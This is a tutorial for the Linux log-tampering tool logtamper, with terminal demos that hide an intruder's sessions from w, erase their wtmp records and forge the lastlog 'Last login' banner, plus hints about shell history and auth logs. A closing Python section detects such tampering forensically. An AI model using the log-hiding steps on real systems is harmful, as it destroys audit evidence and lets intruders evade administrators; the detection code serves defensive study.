Note that logtamper only clears login traces: it works on utmp, wtmp and lastlog. The logs that matter on a Linux system are lastlog, utmp, wtmp, messages, syslog and sulog. sshd also reports every login through syslog to the auth log (/var/log/secure or /var/log/auth.log), which logtamper does not touch at all, and if syslog is forwarded to a remote host that copy is out of reach entirely. So you cannot rely on the tool alone.
In addition, each shell keeps a history of the commands a user has typed, in a file in the user's home directory: .sh_history (ksh), .history (csh) or .bash_history (bash).
For bash, `history -c` only empties the history list held in memory by the current shell; the .bash_history file already on disk is not modified by it, so that file has to be dealt with separately.
Logtamper version 1.1
Logtamper is a tool for *modifying* Linux logs. When it rewrites a log file it restores the file's modification time, so a plain ls -l does not show the edit (atime is left alone, which does not matter). One caveat: the inode change time (ctime) cannot be set from user space, so stat on the file still shows when it was last rewritten.
[root@localhost logtamper]# ./logtamper-static
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu
logtamper [-f utmp_filename] -h username hostname
    hide username connected from hostname
logtamper [-f wtmp_filename] -w username hostname
    erase username from hostname in wtmp file
logtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]]
    modify lastlog info
-f option: specifies the path of the file to modify. It is optional; because log locations differ between systems, you can set the path by hand.
The default log storage location is:
#define UTMPFILE "/var/run/utmp"
#define WTMPFILE "/var/log/wtmp"
#define LASTLOGFILE "/var/log/lastlog"
-h option: sometimes you and the administrator are logged in at the same time, and the administrator can spot you at a glance with w. The -h option removes your entry from utmp so that w (and who, which read the same file) no longer list you. Only utmp is edited: the session's sshd and shell processes and its TCP connection are still visible to ps and netstat.
[root@localhost logtamper]# w
 21:27:25 up 5 days, 13:48,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     -                 Fri14   18:24m  0.33s  0.33s -bash
root     pts/3    192.168.80.1      21:21    6:22   0.04s  0.04s -bash
root     pts/2    192.168.80.1      21:06    0.00s  0.13s  0.00s w
root     pts/4    192.168.80.1      21:21    5:52   0.03s  0.03s -bash
We are connected from the host 192.168.80.1; hiding those sessions looks like this:
[root@localhost logtamper]# ./logtamper-static -h root 192.168.80.1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu
Seems you're invisible Now...Check it out!
[root@localhost logtamper]# w
 21:27:46 up 5 days, 13:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     -                 Fri14   18:24m  0.33s  0.33s -bash
[root@localhost logtamper]#
-w option: clears your login records from wtmp, the file that last reads. The erase is limited to the given username and the hostname it connected from, so other logins are left in place.
[root@localhost logtamper]# last
root     tty1                       Wed Oct  1
root     pts/4    192.168.80.1      Wed Oct  1 06:01:46   still logged in
root     pts/3    192.168.80.1      Wed Oct  1            still logged in

wtmp begins Wed Oct  1 2008
Clear the login records from 192.168.80.1:
[root@localhost logtamper]# ./logtamper-static -w root 192.168.80.1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu
Aho, you are now invisible to last... Check it out!
[root@localhost logtamper]# last
root     tty1                       Wed Oct  1 06:01:46

wtmp begins Wed Oct  1 2008
[root@localhost logtamper]#
-m option: modifies the "last login" location that lastlog stores. This is the line that may catch the eye at ssh login:
login as: root
Sent username "root"
root@192.168.80.128's password:
Last login: Wed Oct  1 21:31:40 2008 from 192.168.80.45
[root@localhost ~]#
If lastlog is not modified, the next time the administrator logs in they will be told that the previous login came from our machine's IP address. The -m option edits that entry:
[root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1
Logtamper v 1.1 for linux
Copyright (C) 2008 by xi4oyu
Aho, now you never come here before...Check it out!
[root@localhost logtamper]#
Of course, this is just an example; in use, substitute the real values. Keep in mind that -m rewrites only the lastlog record, so unless wtmp was also edited with -w, the output of last and the lastlog entry will disagree. The next time the administrator logs in, the banner becomes:
login as: root
Sent username "root"
root@192.168.80.128's password:
Last login: Tue Jan  1 01:01:01 2008 from 1.2.3.4
[root@localhost ~]#
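The -w and -m options above both rewrite fixed-size binary records, and the cleanest way to understand what they leave behind is to parse those records yourself. The following is an added example, not logtamper's code and not from its author: it parses wtmp and lastlog in the glibc x86_64 layout (struct utmp is 384 bytes with 32-bit time fields, struct lastlog is 292 bytes indexed by UID), reproduces the effect the page attributes to -w as plain deletion of matching records (an assumption, since the tool's source is not shown), and then runs the two checks an investigator would apply: logout records that no longer have a matching login, and a lastlog entry that disagrees with the newest login in wtmp. The sample wtmp and lastlog contents are constructed in memory and mirror the sessions in the w/last output above; the names pack_utmp, erase_login, find_anomalies and lastlog_matches_wtmp are this example's own.

```python
# Added example (not logtamper's code): parse wtmp and lastlog in the glibc
# x86_64 layout and cross-check them.  All sample data is constructed in memory.
import struct
from collections import namedtuple

# struct utmp on x86_64 glibc: 384 bytes with 32-bit time fields.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)        # 384
# struct lastlog: int32 ll_time, char ll_line[32], char ll_host[256];
# one fixed-size record per UID, so the file is indexed by uid * LASTLOG_SIZE.
LASTLOG_FMT = "<i32s256s"
LASTLOG_SIZE = struct.calcsize(LASTLOG_FMT)  # 292

EMPTY, BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 0, 2, 7, 8
Utmp = namedtuple("Utmp", "type pid line user host time")
Lastlog = namedtuple("Lastlog", "time line host")

def _cstr(raw):
    """NUL-terminated fixed-width field to str."""
    return raw.split(b"\0", 1)[0].decode("latin-1")

def pack_utmp(type_, pid, line, user, host, time):
    """Build one record; used only to construct the sample wtmp below."""
    return struct.pack(UTMP_FMT, type_, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, time, 0, 0, 0, 0, 0)

def parse_wtmp(data):
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of %d" % UTMP_SIZE)
    recs = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append(Utmp(f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5]), f[9]))
    return recs

def erase_login(data, user, host):
    """Drop every record whose ut_user and ut_host match: the effect the page
    attributes to 'logtamper -w'.  The tool's code is not shown, so treating
    it as plain record deletion is an assumption of this example."""
    kept = bytearray()
    for off in range(0, len(data), UTMP_SIZE):
        rec = data[off:off + UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, rec)
        if not (_cstr(f[4]) == user and _cstr(f[5]) == host):
            kept += rec
    return bytes(kept)

def find_anomalies(recs):
    """Signs that records were removed or zeroed.  A logout (DEAD_PROCESS)
    record carries no user or host, so deleting by user+host leaves it
    behind as a logout on a tty that, according to wtmp, never logged in."""
    issues, open_lines, last_time = [], set(), 0
    for i, r in enumerate(recs):
        if r.type == EMPTY and r.time == 0:
            issues.append((i, "zeroed record"))
        if r.time < last_time:               # wtmp is append-only
            issues.append((i, "timestamp goes backwards"))
        last_time = max(last_time, r.time)
        if r.type == BOOT_TIME:
            open_lines.clear()               # a reboot ends every session
        elif r.type == USER_PROCESS:
            open_lines.add(r.line)
        elif r.type == DEAD_PROCESS:
            if r.line not in open_lines:
                issues.append((i, "logout on %s with no login" % r.line))
            open_lines.discard(r.line)
    return issues

def parse_lastlog(data, uid):
    t, line, host = struct.unpack_from(LASTLOG_FMT, data, uid * LASTLOG_SIZE)
    return Lastlog(t, _cstr(line), _cstr(host))

def lastlog_matches_wtmp(lastlog_data, uid, user, recs):
    """lastlog should equal the user's newest USER_PROCESS record in wtmp;
    'logtamper -m' rewrites lastlog only, so the two sources drift apart."""
    ll = parse_lastlog(lastlog_data, uid)
    logins = [r for r in recs if r.type == USER_PROCESS and r.user == user]
    if not logins:
        return ll.time == 0
    newest = max(logins, key=lambda r: r.time)
    return (ll.time, ll.line, ll.host) == (newest.time, newest.line, newest.host)

# Constructed sample wtmp: boot, console login, two ssh sessions from
# 192.168.80.1 (the first logs out), then a third ssh session.
SAMPLE_WTMP = b"".join([
    pack_utmp(BOOT_TIME, 0, "~", "reboot", "", 1000),
    pack_utmp(USER_PROCESS, 501, "tty1", "root", "", 2000),
    pack_utmp(USER_PROCESS, 777, "pts/3", "root", "192.168.80.1", 3000),
    pack_utmp(USER_PROCESS, 778, "pts/4", "root", "192.168.80.1", 3100),
    pack_utmp(DEAD_PROCESS, 777, "pts/3", "", "", 3500),
    pack_utmp(USER_PROCESS, 779, "pts/2", "root", "192.168.80.1", 4000),
])
# Constructed lastlog holding only uid 0, consistent with the newest login;
# FORGED_LASTLOG is the entry a 'logtamper -m root 1.2.3.4 tty10 ...' run leaves.
SAMPLE_LASTLOG = struct.pack(LASTLOG_FMT, 4000, b"pts/2", b"192.168.80.1")
FORGED_LASTLOG = struct.pack(LASTLOG_FMT, 1000, b"tty10", b"1.2.3.4")
```

On a live system, read /var/log/wtmp and /var/log/lastlog into bytes and pass them in; find_anomalies(parse_wtmp(wtmp)) reports the orphaned pts/3 logout that deleting the 192.168.80.1 sessions leaves behind, and lastlog_matches_wtmp flags a lastlog entry that no login in wtmp accounts for. The record layouts are the 64-bit glibc ones; other libcs and 32-bit builds lay the structs out differently, so check the sizes against the file length before trusting the parse.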